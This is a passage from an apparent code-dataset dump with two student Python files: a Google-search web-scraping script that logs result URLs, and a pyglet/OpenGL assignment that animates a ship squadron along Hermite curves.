"line_number": 72, "usage_type": "call"}, {"api_name": "os.system", "line_number": 74, "usage_type": "call"}]}
+{"seq_id": "32134259264", "text": "# Author: Ana Sanmartin\n#\n# This file obtains from command line the list of words inserted by the user\n\n#Dependencies are\n#pip install beautifulsoup4\n#pip install google\n\n# IMPORTS \n\nimport argparse\nimport os\nfrom downloader import download_text\nfrom check_resource import check_resource_retrieved_before\n#import numpy as np\n\ntry: \n from googlesearch import search \nexcept ImportError: \n print(\"No module named 'google' found\") \n\n\n## CAN BE ESTABLISHED BY THE USER ##\nn = 10;\nurl = ''\nsearcher = 'www.google.com'\nout_path = os.getcwd()\nword = ''\n\ndef google_search(word, url, n, searcher, out_path):\n\n \"\"\"\n query : query string that we want to search for.\n tld : tld stands for top level domain which means we want to search our result on google.com or google.in or some other domain.\n lang : lang stands for language.\n num : Number of results we want.\n start : First result to retrieve.\n stop : Last result to retrieve. Use None to keep searching forever.\n pause : Lapse to wait between HTTP requests. Lapse too short may cause Google to block your IP. Keeping significant lapse will make your program slow but its safe and better option.\n Return : Generator (iterator) that yields found URLs. If the stop parameter is None the iterator will loop forever. \n \"\"\"\n list_searches = []\n \n\n #We have two different functionalities: The user enters a word for searching or a specific url\n if len(url) != 0:\n # User has entered a specific URL\n print(check_resource_retrieved_before(url, out_path))\n if (check_resource_retrieved_before(url, out_path)):\n print(\"This URL already was searched before. Thus, we will not search again for the text\")\n \n else:\n urls2doc(url, word.replace(\"_\", \" \"), out_path)\n download_text(out_path)\n\n else: \n query = word.replace(\"_\", \" \")\n \n print(query)\n print(out_path)\n \n list_searches = search_only(query, n, out_path)\n if len(list_searches) != 0:\n for url in list_searches:\n urls2doc(url, query, out_path)\n download_text(out_path)\n else:\n print(\"Nothing was retrieved\")\n\n\ndef search_only(query, n, out_path):\n list_searches = []\n counter = 0\n \n for i in search(query, tld=\"es\", num=n, start=0, stop=None, pause=2):\n if (check_resource_retrieved_before(i, out_path)):\n print(\"we have encountered a match\")\n else:\n list_searches.append(i)\n counter = counter + 1\n #print(counter)\n if (counter == n):\n break\n return list_searches\n \n \n\n \ndef urls2doc(url, word, dir_path):\n\n dir_path += \"/url_list.txt\"\n \n doc = open(dir_path, \"a\")\n #print(doc.read())\n\n doc.write(url + \" \" + word + \"\\n\")\n doc.close()\n \n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"Search by terms\")\n\n parser.add_argument('-w',\n \"--word\",\n type=str,\n help=\"Word to search\")\n \n parser.add_argument('-u',\n \"--url\",\n type=str,\n help=\"Specific url to search\") \n \n parser.add_argument('-n',\n \"--n\",\n type=int,\n help=\"Number of pages to store\")\n\n parser.add_argument('-s',\n \"--search\",\n type=str,\n help=\"Search engine to use.\")\n\n parser.add_argument('-o',\n \"--output\",\n type=str,\n help=\"Output path where files are going to be stored\")\n\n # Parseo de los argumentos\n arguments = vars(parser.parse_args())\n\n if arguments['word']:\n if isinstance(arguments['word'], str):\n word = arguments['word']\n else:\n print(\"ERROR: Please enter valid words\")\n exit()\n \n if arguments['url']:\n if isinstance(arguments['url'], str):\n url = arguments['url']\n else:\n print(\"ERROR: Please enter a valid search engine.\")\n exit()\n \n if arguments['n']:\n if isinstance(arguments['n'], int):\n if arguments['n'] > 0:\n n = arguments['n']\n else:\n print(\"ERROR: N must be bigger than 0\")\n exit()\n \n if arguments['search']:\n if isinstance(arguments['search'], str):\n searcher = arguments['search']\n else:\n print(\"ERROR: Please enter a valid search engine.\")\n exit()\n \n if arguments['output']:\n if isinstance(arguments['output'], str):\n if(os.path.isdir()):\n output_type = arguments['output']\n else:\n print(\"ERROR: Please enter a valid path.\")\n exit()\n else:\n print(\"ERROR: Please enter a valid path.\")\n exit()\n\n google_search(word, url, n, searcher, out_path)\n\n", "repo_name": "cossorzano/copenmed_tools", "sub_path": "webscraping/searcher.py", "file_name": "searcher.py", "file_ext": "py", "file_size_in_byte": 5174, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.getcwd", "line_number": 27, "usage_type": "call"}, {"api_name": "check_resource.check_resource_retrieved_before", "line_number": 48, "usage_type": "call"}, {"api_name": "check_resource.check_resource_retrieved_before", "line_number": 49, "usage_type": "call"}, {"api_name": "downloader.download_text", "line_number": 54, "usage_type": "call"}, {"api_name": "downloader.download_text", "line_number": 66, "usage_type": "call"}, {"api_name": "googlesearch.search", "line_number": 75, "usage_type": "call"}, {"api_name": "check_resource.check_resource_retrieved_before", "line_number": 76, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 163, "usage_type": "call"}, {"api_name": "os.path", "line_number": 163, "usage_type": "attribute"}]}
+{"seq_id": "38309837337", "text": "import pyglet\r\nimport random\r\nfrom OpenGL.GL import *\r\n\r\nfrom math import *\r\nfrom collections import deque\r\nfrom itertools import chain\r\nfrom pathlib import Path\r\nimport numpy as np\r\nimport sys\r\nimport os.path\r\nsys.path.append(os.path.dirname(os.path.dirname(os.path.dirname((os.path.abspath(__file__))))))\r\n\r\nimport libs.transformations as tr\r\nimport libs.basic_shapes as bs\r\nimport libs.scene_graph as sg\r\nimport libs.easy_shaders as es\r\nimport libs.lighting_shaders as ls\r\nimport libs.curves as cs\r\n\r\nfrom libs.gpu_shape import createGPUShape\r\nfrom libs.obj_handler import read_OBJ2\r\nfrom libs.assets_path import getAssetPath\r\nfrom utils import createOFFShape\r\nfrom ship import createShip, createsombra\r\nfrom pyglet.graphics.shader import Shader, ShaderProgram\r\nfrom pathlib import Path\r\nfrom itertools import chain\r\n\r\nclass Controller(pyglet.window.Window):\r\n\r\n def __init__(self, width, height, tittle=f\"Tarea 3 - Adolfo Arenas P\"):\r\n super().__init__(width, height, tittle)\r\n self.pipeline = es.SimpleTextureModelViewProjectionShaderProgram()\r\n self.pipeline2 = es.SimpleModelViewProjectionShaderProgram()\r\n self.check_points = []\r\n self.check_points_tograph = []\r\n self.step = 0\r\n self.curve = []\r\n self.show_route = False\r\n self.path= []\r\n\r\nwidth = 1280\r\nheight = 960\r\nN = 100\r\ncontroller = Controller(width, height)\r\nPERSPECTIVE_PROJECTION = 1\r\nORTOGRAPHIC_PROJECTION = 0\r\n\r\nPROJECTIONS = [tr.ortho(-8, 8, -8, 8, 0.0001, 1000),\r\n tr.perspective(80, float(width)/float(height), 0.0001, 100)]\r\n\r\nwith open(Path(os.path.dirname(__file__)) / \"point_vertex_program.glsl\") as f:\r\n vertex_program = f.read()\r\n\r\nwith open(Path(os.path.dirname(__file__)) / \"point_fragment_program.glsl\") as f:\r\n fragment_program = f.read()\r\n\r\nvert_shader = Shader(vertex_program, \"vertex\")\r\nfrag_shader = Shader(fragment_program, \"fragment\")\r\npipeline = ShaderProgram(vert_shader, frag_shader)\r\n\r\n\r\nclass Ship():\r\n\r\n def __init__(self):\r\n self.shape = createShip(controller.pipeline)\r\n self.shapesombra = createsombra(controller.pipeline)\r\n self.x = 0\r\n self.y = 5\r\n self.z = 0\r\n self.velocity = 0\r\n self.rotationylocal = 0\r\n self.altitude = 0\r\n self.route = []\r\n self.start_route = False\r\n self.linex = 0\r\n self.liney = 0\r\n self.linez = 0\r\n\r\nship = Ship()\r\n\r\nclass Camera:\r\n\r\n def __init__(self, at=np.array([ship.x, ship.y, ship.z],dtype=float), \r\n eye=np.array([5 , 7, 5],dtype=float), \r\n up=np.array([0, 1, 0],dtype=float)) -> None:\r\n \r\n #Parametros de la camara\r\n self.at = at\r\n self.eye = eye\r\n self.up = up\r\n\r\n self.available_projections = PROJECTIONS\r\n self.projection = self.available_projections[ORTOGRAPHIC_PROJECTION]\r\n\r\n def set_projection(self, projection_name):\r\n self.projection = self.available_projections[projection_name]\r\n #siga a nuestra nave y no se rote\r\n\r\ncamera = Camera()\r\n\r\nclass Point():\r\n \r\n def __init__(self, position):\r\n self.ex_shape = createGPUShape(controller.pipeline2,bs.createColorCube(1.0, 0.5, 0.0))\r\n self.position = np.array(position, dtype=np.float32)\r\n\r\n#Aqui agregamos hijos de la clase Ship que creamos para formar nuestro escuadron\r\ndef crearEscuadron():\r\n\r\n shipNode1 = sg.SceneGraphNode('ship')\r\n shipNode1.transform = tr.matmul([tr.rotationY(np.deg2rad(180)), tr.uniformScale(0.8)])\r\n shipNode1.childs += [ship.shape]\r\n\r\n shipNode2 = sg.SceneGraphNode('ship2')\r\n shipNode2.transform = tr.translate(2,0,3)\r\n shipNode2.childs += [shipNode1]\r\n\r\n shipNode3 = sg.SceneGraphNode('ship3')\r\n shipNode3.transform = tr.translate(-2,0,3)\r\n shipNode3.childs += [shipNode1]\r\n\r\n Escuadron = sg.SceneGraphNode('Escuadron')\r\n Escuadron.transform = tr.translate(0,0.1,0)\r\n Escuadron.childs += [shipNode1]\r\n Escuadron.childs += [shipNode2]\r\n Escuadron.childs += [shipNode3]\r\n\r\n return Escuadron\r\n#Separe sombras de la nave para que las sombras no subieran tambien, ya que daba un efecto raro. Ahora las sombras siempre estan a la altura del piso.\r\ndef crearSombra():\r\n sombra = sg.SceneGraphNode('sombra')\r\n sombra.transform = tr.matmul([tr.translate(0,0.1,0), tr.scale(0.6,0.01,0.6), tr.rotationY(np.deg2rad(180))])\r\n sombra.childs += [ship.shapesombra]\r\n\r\n sombra1 = sg.SceneGraphNode('sombra1')\r\n sombra1.transform = tr.translate(ship.x, 0, ship.z)\r\n sombra1.childs += [sombra]\r\n\r\n sombra2 = sg.SceneGraphNode('sombra2')\r\n sombra2.transform = tr.translate(ship.x+2, 0, ship.z+3)\r\n sombra2.childs += [sombra]\r\n\r\n sombra3 = sg.SceneGraphNode('sombra3')\r\n sombra3.transform = tr.translate(ship.x-2, 0, ship.z+3)\r\n sombra3.childs += [sombra]\r\n\r\n Sombras = sg.SceneGraphNode('Sombras')\r\n Sombras.transform = tr.translate(0,0,0)\r\n Sombras.childs += [sombra1]\r\n Sombras.childs += [sombra2]\r\n Sombras.childs += [sombra3]\r\n\r\n return Sombras\r\n\r\n#Con ayuda del auxiliar 3 ponemos un piso a la escena\r\ndef createFloor() -> sg.SceneGraphNode:\r\n\r\n Floor = bs.createMinecraftFloor(1.5)\r\n gpuFloor = es.GPUShape().initBuffers()\r\n controller.pipeline.setupVAO(gpuFloor)\r\n gpuFloor.fillBuffers(Floor.vertices,Floor.indices,GL_STATIC_DRAW)\r\n gpuFloor.texture = es.textureSimpleSetup(\r\n getAssetPath(\"floorTexture.png\"), GL_REPEAT, GL_REPEAT, GL_NEAREST, GL_NEAREST)\r\n \r\n Piso = sg.SceneGraphNode('Piso')\r\n Piso.transform = tr.scale(20,20,100)\r\n Piso.childs += [gpuFloor]\r\n\r\n totalFloor = sg.SceneGraphNode('totalFloor')\r\n totalFloor.transform = tr.matmul([tr.translate(0, 0, 0), tr.rotationX(np.deg2rad(90))])\r\n totalFloor.childs += [Piso]\r\n\r\n return totalFloor\r\n\r\n#Con esto ponemos los objetos de la escena (lo quise hacer separado del piso para una futura tarea) \r\ndef createScene() -> sg.SceneGraphNode:\r\n\r\n Cube = bs.createMinecraftCube(1)\r\n gpuCube = es.GPUShape().initBuffers()\r\n controller.pipeline.setupVAO(gpuCube)\r\n gpuCube.fillBuffers(Cube.vertices, Cube.indices, GL_STATIC_DRAW)\r\n gpuCube.texture = es.textureSimpleSetup(\r\n getAssetPath('circuit.jpg'), GL_REPEAT, GL_REPEAT, GL_NEAREST, GL_NEAREST)\r\n \r\n turret = createGPUShape(controller.pipeline, read_OBJ2(getAssetPath(\"Laser_turret.obj\")))\r\n turret.texture = es.textureSimpleSetup(getAssetPath(\"laser_turret_BaseColor.png\"), \r\n GL_REPEAT, GL_REPEAT, GL_NEAREST, GL_NEAREST)\r\n glGenerateMipmap(GL_TEXTURE_2D)\r\n\r\n Torreta = sg.SceneGraphNode('Torreta')\r\n Torreta.transform = tr.uniformScale(1)\r\n Torreta.childs += [turret]\r\n\r\n Torreta1 = sg.SceneGraphNode('Torreta1')\r\n Torreta1.transform = tr.translate(0, 0, -9)\r\n Torreta1.childs += [Torreta]\r\n\r\n Torreta2 = sg.SceneGraphNode('Torreta2')\r\n Torreta2.transform = tr.translate(-5,0, 5)\r\n Torreta2.childs += [Torreta]\r\n\r\n Torreta3 = sg.SceneGraphNode('Torreta3')\r\n Torreta3.transform = tr.translate(8,0,8)\r\n Torreta3.childs += [Torreta]\r\n \r\n Condensador = sg.SceneGraphNode('condensador')\r\n Condensador.transform = tr.uniformScale(0.8)\r\n Condensador.childs += [gpuCube]\r\n\r\n Condensador1 = sg.SceneGraphNode('condesador1')\r\n Condensador1.transform = tr.matmul([tr.translate(-4, 1, 3), tr.scale(1,5,1)])\r\n Condensador1.childs += [Condensador]\r\n\r\n Condensador2 = sg.SceneGraphNode('condesador2')\r\n Condensador2.transform = tr.matmul([tr.translate(4, 1, -3), tr.scale(7,2,1)])\r\n Condensador2.childs += [Condensador]\r\n\r\n scene = sg.SceneGraphNode('scene')\r\n scene.childs += [Condensador1]\r\n scene.childs += [Condensador2]\r\n scene.childs += [Torreta1]\r\n scene.childs += [Torreta2]\r\n scene.childs += [Torreta3]\r\n\r\n return scene\r\n\r\n#con esta funcion vamos moviendo el escuadron, segun la propiedades que le pusimos a la nave \r\ndef add_points(position, orientation):\r\n controller.check_points_tograph.append(Point((position[0],position[1],position[2])))\r\n controller.check_points.append([position[0],position[1],position[2],orientation])\r\n\r\n@controller.event\r\ndef on_key_press(symbol, modifiers):\r\n global vector\r\n if symbol == pyglet.window.key.P: #Esto nos permite cambiar a una vista en perspectiva\r\n camera.set_projection(PERSPECTIVE_PROJECTION)\r\n if symbol == pyglet.window.key.O: #Esto nos permite cambiar a una vista ortografica\r\n camera.set_projection(ORTOGRAPHIC_PROJECTION)\r\n if symbol == pyglet.window.key.W: #avanzar\r\n ship.velocity = -0.3\r\n if symbol == pyglet.window.key.S: #retroceder\r\n ship.velocity = 0.1\r\n if symbol == pyglet.window.key.A: #rotar antihorario\r\n ship.rotationylocal = 0.1\r\n if symbol == pyglet.window.key.D: #rotar horario\r\n ship.rotationylocal = -0.1 \r\n if symbol == pyglet.window.key.R: #Aqui se graban puntos y ademas se crean las matrices y la curva final de hermite\r\n Yrotation = sg.findTransform(escuadron, 'Escuadron')\r\n add_points([ship.x,ship.y,ship.z],[Yrotation[0][0],Yrotation[0][2],Yrotation[2][0],Yrotation[2][2]])\r\n controller.curve = []\r\n if len(controller.check_points) == 0:\r\n pass\r\n if len(controller.check_points) == 1:\r\n pass\r\n else:\r\n for i in range(1, len(controller.check_points)):\r\n P1 = np.array([[controller.check_points[i-1][0],\r\n controller.check_points[i-1][1], \r\n controller.check_points[i-1][2]]]).T \r\n P2 = np.array([[controller.check_points[i][0],\r\n controller.check_points[i][1],\r\n controller.check_points[i][2]]]).T \r\n T1 = np.array([[30, 0,30]]).T\r\n T2 = np.array([[30, 0,30]]).T# #la idea es crear una matriz de hermite para los puntos de control\r\n matrix = cs.hermiteMatrix(P1, P2, T1, T2)\r\n controller.curve.append(cs.evalCurve(matrix, N))\r\n if len(controller.curve) == 0:\r\n pass\r\n if len(controller.curve) == 1:\r\n ship.route = controller.curve[0]\r\n else:\r\n ship.route = controller.curve[0]\r\n for j in range(1, len(controller.curve)): #luego aqui abajo quiero concatenar la lista para crear una sola curva final\r\n ship.route = np.concatenate((ship.route, controller.curve[j])) \r\n controller.step = 0\r\n if symbol == pyglet.window.key.L: #Nos hace comenzar a recorrer la ruta (debe mantenerse apretado L)\r\n if len(controller.curve) == 0: #Esto es para asegurarnos de que almenos haya una curva, la cantidad de curvas siempre sera un numero natural.\r\n pass\r\n else:\r\n ship.start_route = True #este booleano le indica a update que debe cambiar la transformacion de la nave\r\n if symbol == pyglet.window.key.V: #Nos permite visualizar la ruta (debe mantenerse apretado V)\r\n controller.show_route = True\r\n if symbol == pyglet.window.key.ESCAPE:\r\n controller.close()\r\n\r\n@controller.event\r\ndef on_key_release(symbol, modifiers):\r\n if symbol == pyglet.window.key.W:\r\n ship.velocity = 0\r\n if symbol == pyglet.window.key.S:\r\n ship.velocity = 0\r\n if symbol == pyglet.window.key.A:\r\n ship.rotationylocal = 0\r\n if symbol == pyglet.window.key.D:\r\n ship.rotationylocal = 0\r\n if symbol == pyglet.window.key.Q: \r\n ship.rotationzlocal = 0\r\n if symbol == pyglet.window.key.E:\r\n ship.rotationzlocal = 0\r\n if symbol == pyglet.window.key.L:\r\n ship.start_route = False\r\n if symbol == pyglet.window.key.V:\r\n controller.show_route = False\r\n\r\n@controller.event\r\ndef on_mouse_drag(x,y,dx,dy, buttons, modifiers):\r\n if buttons == pyglet.window.mouse.LEFT: #pense que al apretar el left click y luego permitir que la nave se moviera\r\n if y > 460: #era mas natural que se moviera siempre\r\n ship.altitude = 20*dy/960\r\n if y == 0:\r\n ship.altitude = 0\r\n elif y < 0:\r\n ship.altitude = -10*dy/960\r\n\r\nescuadron = crearEscuadron()\r\nsombras = crearSombra()\r\npiso = createFloor()\r\nescenario = createScene()\r\npunto = createGPUShape(controller.pipeline2, bs.createAxis(0.0001))\r\n\r\ndef update(dt):\r\n global vector\r\n escuadron.transform = tr.matmul([escuadron.transform, tr.rotationY(ship.rotationylocal), tr.translate(0, ship.altitude, ship.velocity)]) #esta se encarga de rotar mi nave sobre su eje y, ademas de trasladarla\r\n ship.x = sg.findPosition(escuadron,'Escuadron')[0][0] #actualizamos los parametros de la posicion de la nave\r\n ship.y = sg.findPosition(escuadron, 'Escuadron')[1][0]\r\n ship.z = sg.findPosition(escuadron, 'Escuadron')[2][0]\r\n sombras.transform = tr.matmul([sombras.transform, tr.rotationY(ship.rotationylocal), tr.translate(0, 0, ship.velocity)])\r\n camera.eye[1] = ship.y+7\r\n camera.at[1] = ship.y\r\n camera.eye[0] = ship.x+5 \r\n camera.at[0] = ship.x\r\n camera.eye[2] = ship.z+5 \r\n camera.at[2] = ship.z\r\n\r\n if controller.step == (N*len(controller.curve))-1:\r\n pass\r\n else:\r\n controller.step += 1\r\n\r\n if controller.step >= 1 and len(ship.route) >=1: \r\n vector = [ship.route[controller.step][0]-ship.route[controller.step-1][0], #este es un vector que toma tiene como coordernadas xf-xi para cada instante,\r\n ship.route[controller.step][1]-ship.route[controller.step-1][1], #esto permite darle orientacion a la nave mientras recorre\r\n ship.route[controller.step][2]-ship.route[controller.step-1][2]]\r\n angle=pi+atan2(vector[0],vector[2]) #aca sacamos la arcotangente, en un principio queda dado vuelta pero para esto se le suma pi\r\n \r\n if ship.start_route:\r\n transformEscuadron = tr.matmul([ #Este transform permite a la nave recorrer la curva de hermite\r\n tr.translate(ship.route[controller.step, 0],\r\n ship.route[controller.step, 1],\r\n ship.route[controller.step, 2]), tr.rotationY(angle)])\r\n escuadron.transform = transformEscuadron\r\n sombras.transform = transformEscuadron\r\n ship.linex = ship.route[controller.step][0]\r\n ship.liney = ship.route[controller.step][1]\r\n ship.linez = ship.route[controller.step][2]\r\n\r\n@controller.event\r\ndef on_draw():\r\n controller.clear()\r\n\r\n glClearColor(1.0, 1.0, 1.0, 0.8)\r\n\r\n view = tr.lookAt(\r\n camera.eye,\r\n camera.at,\r\n camera.up\r\n )\r\n\r\n for points in controller.check_points_tograph: #Aca dibujamos los puntos de control\r\n transform = tr.matmul([\r\n tr.translate(points.position[0],points.position[1],points.position[2]), \r\n tr.uniformScale(0.25)]\r\n )\r\n glUseProgram(controller.pipeline2.shaderProgram)\r\n glUniformMatrix4fv(glGetUniformLocation(controller.pipeline2.shaderProgram, \"projection\"), 1, GL_TRUE, camera.projection)\r\n glUniformMatrix4fv(glGetUniformLocation(controller.pipeline2.shaderProgram, \"view\"), 1, GL_TRUE, view)\r\n glUniformMatrix4fv(glGetUniformLocation(controller.pipeline2.shaderProgram, \"model\"), 1, GL_TRUE, transform)\r\n controller.pipeline2.drawCall(points.ex_shape)\r\n\r\n \r\n glUseProgram(controller.pipeline2.shaderProgram)\r\n glUniformMatrix4fv(glGetUniformLocation(controller.pipeline2.shaderProgram, \"model\"), 1, GL_TRUE, tr.identity())\r\n controller.pipeline2.drawCall(punto)\r\n\r\n if controller.show_route and len(controller.curve)>=1: #basados en cloth.py aqui dibujamos las lineas de la ruta\r\n lines = pipeline.vertex_list( #creamos una lista de vertices\r\n len(ship.route),\r\n pyglet.gl.GL_LINES,position=\"f\",)\r\n tupla = ()\r\n for i in range(0, len(ship.route)): #Aqui creamos la posicion de los vertices en base a nuestra curva\r\n tupla += (ship.route[i][0], ship.route[i][1], ship.route[i][2])\r\n lines.position[:] = tupla #asignamos las tuplas creadas como la posicion\r\n lines.draw(pyglet.gl.GL_LINES) \r\n\r\n glUseProgram(controller.pipeline.shaderProgram)\r\n glUniformMatrix4fv(glGetUniformLocation(controller.pipeline.shaderProgram, \"projection\"), 1, GL_TRUE, camera.projection)\r\n glUniformMatrix4fv(glGetUniformLocation(controller.pipeline.shaderProgram, \"view\"), 1, GL_TRUE, view)\r\n glUniform3f(glGetUniformLocation(controller.pipeline.shaderProgram, \"viewPosition\"), camera.at[0], camera.at[1], camera.at[2])\r\n glEnable(GL_DEPTH_TEST)\r\n sg.drawSceneGraphNode(escenario, controller.pipeline, \"model\")\r\n sg.drawSceneGraphNode(piso, controller.pipeline, \"model\")\r\n sg.drawSceneGraphNode(sombras, controller.pipeline, \"model\")\r\n sg.drawSceneGraphNode(escuadron, controller.pipeline, \"model\")\r\n\r\nif __name__ == \"__main__\":\r\n pyglet.clock.schedule_interval(update, 1/60)\r\n pyglet.app.run()", "repo_name": "Adolphsus/CC3501", "sub_path": "Tarea3/tarea3.py", "file_name": "tarea3.py", "file_ext": "py", "file_size_in_byte": 17400, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.path.append", "line_number": 12, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 12, "usage_type": "name"}, {"api_name": "os.path.path.abspath", "line_number": 12, "usage_type": "call"}, {"api_name": "pyglet.window", "line_number": 30, "usage_type": "attribute"}, {"api_name": "libs.easy_shaders.SimpleTextureModelViewProjectionShaderProgram", "line_number": 34, "usage_type": "call"}, {"api_name": "libs.easy_shaders", "line_number": 34, "usage_type": "name"}, {"api_name": "libs.easy_shaders.SimpleModelViewProjectionShaderProgram", "line_number": 35, "usage_type": "call"}, {"api_name": "libs.easy_shaders", "line_number": 35, "usage_type": "name"}, {"api_name": "libs.transformations.ortho", "line_number": 50, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 50, "usage_type": "name"}, {"api_name": "libs.transformations.perspective", "line_number": 51, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 51, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.path.dirname", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 53, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.path.dirname", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 56, "usage_type": "name"}, {"api_name": "pyglet.graphics.shader.Shader", "line_number": 59, "usage_type": "call"}, {"api_name": "pyglet.graphics.shader.Shader", "line_number": 60, "usage_type": "call"}, {"api_name": "pyglet.graphics.shader.ShaderProgram", "line_number": 61, "usage_type": "call"}, {"api_name": "ship.createShip", "line_number": 67, "usage_type": "call"}, {"api_name": "ship.createsombra", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 85, "usage_type": "call"}, {"api_name": "ship.x", "line_number": 85, "usage_type": "attribute"}, {"api_name": "ship.y", "line_number": 85, "usage_type": "attribute"}, {"api_name": "ship.z", "line_number": 85, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 87, "usage_type": "call"}, {"api_name": "libs.gpu_shape.createGPUShape", "line_number": 106, "usage_type": "call"}, {"api_name": "libs.basic_shapes.createColorCube", "line_number": 106, "usage_type": "call"}, {"api_name": "libs.basic_shapes", "line_number": 106, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 107, "usage_type": "attribute"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 112, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 112, "usage_type": "name"}, {"api_name": "libs.transformations.matmul", "line_number": 113, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 113, "usage_type": "name"}, {"api_name": "libs.transformations.rotationY", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 113, "usage_type": "call"}, {"api_name": "libs.transformations.uniformScale", "line_number": 113, "usage_type": "call"}, {"api_name": "ship.shape", "line_number": 114, "usage_type": "attribute"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 116, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 116, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 117, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 117, "usage_type": "name"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 120, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 120, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 121, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 121, "usage_type": "name"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 124, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 124, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 125, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 125, "usage_type": "name"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 133, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 133, "usage_type": "name"}, {"api_name": "libs.transformations.matmul", "line_number": 134, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 134, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 134, "usage_type": "call"}, {"api_name": "libs.transformations.scale", "line_number": 134, "usage_type": "call"}, {"api_name": "libs.transformations.rotationY", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 134, "usage_type": "call"}, {"api_name": "ship.shapesombra", "line_number": 135, "usage_type": "attribute"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 137, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 137, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 138, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 138, "usage_type": "name"}, {"api_name": "ship.x", "line_number": 138, "usage_type": "attribute"}, {"api_name": "ship.z", "line_number": 138, "usage_type": "attribute"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 141, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 141, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 142, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 142, "usage_type": "name"}, {"api_name": "ship.x", "line_number": 142, "usage_type": "attribute"}, {"api_name": "ship.z", "line_number": 142, "usage_type": "attribute"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 145, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 145, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 146, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 146, "usage_type": "name"}, {"api_name": "ship.x", "line_number": 146, "usage_type": "attribute"}, {"api_name": "ship.z", "line_number": 146, "usage_type": "attribute"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 149, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 149, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 150, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 150, "usage_type": "name"}, {"api_name": "libs.basic_shapes.createMinecraftFloor", "line_number": 160, "usage_type": "call"}, {"api_name": "libs.basic_shapes", "line_number": 160, "usage_type": "name"}, {"api_name": "libs.easy_shaders.GPUShape", "line_number": 161, "usage_type": "call"}, {"api_name": "libs.easy_shaders", "line_number": 161, "usage_type": "name"}, {"api_name": "libs.easy_shaders.textureSimpleSetup", "line_number": 164, "usage_type": "call"}, {"api_name": "libs.easy_shaders", "line_number": 164, "usage_type": "name"}, {"api_name": "libs.assets_path.getAssetPath", "line_number": 165, "usage_type": "call"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 167, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 167, "usage_type": "name"}, {"api_name": "libs.transformations.scale", "line_number": 168, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 168, "usage_type": "name"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 171, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 171, "usage_type": "name"}, {"api_name": "libs.transformations.matmul", "line_number": 172, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 172, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 172, "usage_type": "call"}, {"api_name": "libs.transformations.rotationX", "line_number": 172, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 172, "usage_type": "call"}, {"api_name": "libs.scene_graph.SceneGraphNode", "line_number": 158, "usage_type": 